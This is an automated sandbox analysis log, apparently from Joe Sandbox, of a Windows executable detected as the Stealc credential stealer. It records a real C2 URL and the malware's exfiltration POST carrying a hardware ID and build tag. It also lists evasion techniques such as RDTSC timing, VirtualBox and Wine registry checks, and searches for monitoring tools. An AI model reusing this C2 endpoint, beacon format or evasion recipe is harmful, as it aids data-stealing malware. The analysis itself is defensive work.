Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_006940F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0068E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00681710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00681710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_006947C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0068F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00694B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00694B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00693B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00693B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0068DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0068BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0068EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0068DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0068DF10

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.206/6c4adf523b719729.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 30 43 38 32 34 46 37 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"9D0C824F71144293944220------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build"tale------KEHDHIDAEHCFHJJJJECA--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.206 185.215.113.206

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006862D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_006862D0

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 30 43 38 32 34 46 37 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"9D0C824F71144293944220------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build"tale------KEHDHIDAEHCFHJJJJECA--

Source: file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/0
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpN
Source: file.exe, 00000000.00000002.2132664415.0000000001482000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpfh
Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpz
Source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006C0098	0_2_006C0098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006B2138	0_2_006B2138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006DB198	0_2_006DB198
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4E14B	0_2_00B4E14B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EE258	0_2_006EE258
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0099720E	0_2_0099720E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006C4288	0_2_006C4288
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009EF3C0	0_2_009EF3C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AD73CB	0_2_00AD73CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0070B308	0_2_0070B308
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ADC305	0_2_00ADC305
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006FD39E	0_2_006FD39E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009C9489	0_2_009C9489
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006A4573	0_2_006A4573
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006AE544	0_2_006AE544
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006C45A8	0_2_006C45A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006ED5A8	0_2_006ED5A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006FA648	0_2_006FA648
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007096FD	0_2_007096FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006C66C8	0_2_006C66C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AA6645	0_2_00AA6645
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006DD720	0_2_006DD720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F6799	0_2_006F6799
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006D4868	0_2_006D4868
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009E88CB	0_2_009E88CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EF8D6	0_2_006EF8D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A3281C	0_2_00A3281C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006DB8A8	0_2_006DB8A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ADA86A	0_2_00ADA86A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006D98B8	0_2_006D98B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A979D6	0_2_00A979D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AE1A03	0_2_00AE1A03
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A94BD3	0_2_00A94BD3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006E8BD9	0_2_006E8BD9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F4BA8	0_2_006F4BA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F0B88	0_2_006F0B88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006FAC28	0_2_006FAC28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA7C2A	0_2_00BA7C2A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009C1C09	0_2_009C1C09
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006DBD68	0_2_006DBD68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006B1D78	0_2_006B1D78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AD8D99	0_2_00AD8D99
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006EAD38	0_2_006EAD38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006D4DC8	0_2_006D4DC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9FD7B	0_2_00B9FD7B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006D5DB9	0_2_006D5DB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006C8E78	0_2_006C8E78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ADDE9C	0_2_00ADDE9C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006F1EE8	0_2_006F1EE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AEBFDB	0_2_00AEBFDB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6AF6E	0_2_00B6AF6E

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00684610 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: fozyxqhw ZLIB complexity 0.9946884020814342

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00699790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00699790

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00693970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00693970

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\3TZGWVHC.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 2123776 > 1048576

Source: file.exe

Static PE information: Raw size of fozyxqhw is bigger than: 0x100000 < 0x19b600

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.680000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00699BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00699BB0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x215498 should be: 0x20f1cd

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: fozyxqhw
Source: file.exe	Static PE information: section name: gnsdcfju
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BC20AC push eax; mov dword ptr [esp], ebp	0_2_00BC2165
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AED0FE push 4AA7AFC2h; mov dword ptr [esp], edi	0_2_00AED150
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AED0FE push 27CE0C78h; mov dword ptr [esp], ecx	0_2_00AED17E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC10CB push 6604EB85h; mov dword ptr [esp], eax	0_2_00AC10F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC10CB push 2A19899Eh; mov dword ptr [esp], ebx	0_2_00AC112A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC10CB push 657E7F5Eh; mov dword ptr [esp], eax	0_2_00AC1138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC10CB push edi; mov dword ptr [esp], esi	0_2_00AC1163
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC10CB push 463A6754h; mov dword ptr [esp], edx	0_2_00AC11CA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC10CB push edx; mov dword ptr [esp], 3C1F67F5h	0_2_00AC11D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA2042 push edx; mov dword ptr [esp], eax	0_2_00DA20BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA2042 push edx; mov dword ptr [esp], 00001000h	0_2_00DA20CE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA2042 push ecx; mov dword ptr [esp], ebx	0_2_00DA20DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA2042 push ebx; mov dword ptr [esp], 77F30161h	0_2_00DA20F8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA2042 push edi; mov dword ptr [esp], 5FBD8444h	0_2_00DA211F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF4022 push 7E246A93h; mov dword ptr [esp], ebp	0_2_00BF3F57
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BAC005 push edi; mov dword ptr [esp], edx	0_2_00BAC6FF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BF3072 push 2679ED87h; mov dword ptr [esp], edx	0_2_00BF30A1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5D068 push 633BB1C2h; mov dword ptr [esp], ecx	0_2_00B5D10C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B5D068 push ebp; mov dword ptr [esp], edi	0_2_00B5D125
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BA7192 push eax; mov dword ptr [esp], esi	0_2_00BA71FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B031F1 push eax; mov dword ptr [esp], ecx	0_2_00B0322C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B031F1 push 1E9AC6AAh; mov dword ptr [esp], edx	0_2_00B03279
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA21B7 push edi; mov dword ptr [esp], esp	0_2_00DA21C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA21B7 push ebx; mov dword ptr [esp], 7F9BAFF6h	0_2_00DA21D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA21B7 push eax; mov dword ptr [esp], ecx	0_2_00DA221B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00DA21B7 push ecx; mov dword ptr [esp], 6F55E5AAh	0_2_00DA2225
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A0613E push edi; mov dword ptr [esp], 199F7ED6h	0_2_00A061A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A0613E push 7533DAF5h; mov dword ptr [esp], ecx	0_2_00A061BC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5D17C push ebp; mov dword ptr [esp], esi	0_2_00A5D2C4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5D17C push eax; mov dword ptr [esp], edx	0_2_00A5D2D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B4E14B push 2D004818h; mov dword ptr [esp], ebx	0_2_00B4E171

Source: file.exe

Static PE information: section name: fozyxqhw entropy: 7.952608283646461

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

0_2_00699BB0

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7CB8 second address: AE7CCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7CCD second address: AE7CF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8838h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F0AD95F8826h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6DAE second address: AE6DB8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD8C6A9C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6DB8 second address: AE6DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6DBE second address: AE6DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0AD8C6A9C8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6DDF second address: AE6DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE6DE3 second address: AE6DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0AD8C6A9C2h 0x0000000e ja 00007F0AD8C6A9B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE70EE second address: AE70F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE70F2 second address: AE7102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0AD8C6A9BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7102 second address: AE7128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0AD95F884Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F8839h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7569 second address: AE7575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F0AD8C6A9B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE7575 second address: AE757A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9CCD second address: AE9CD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
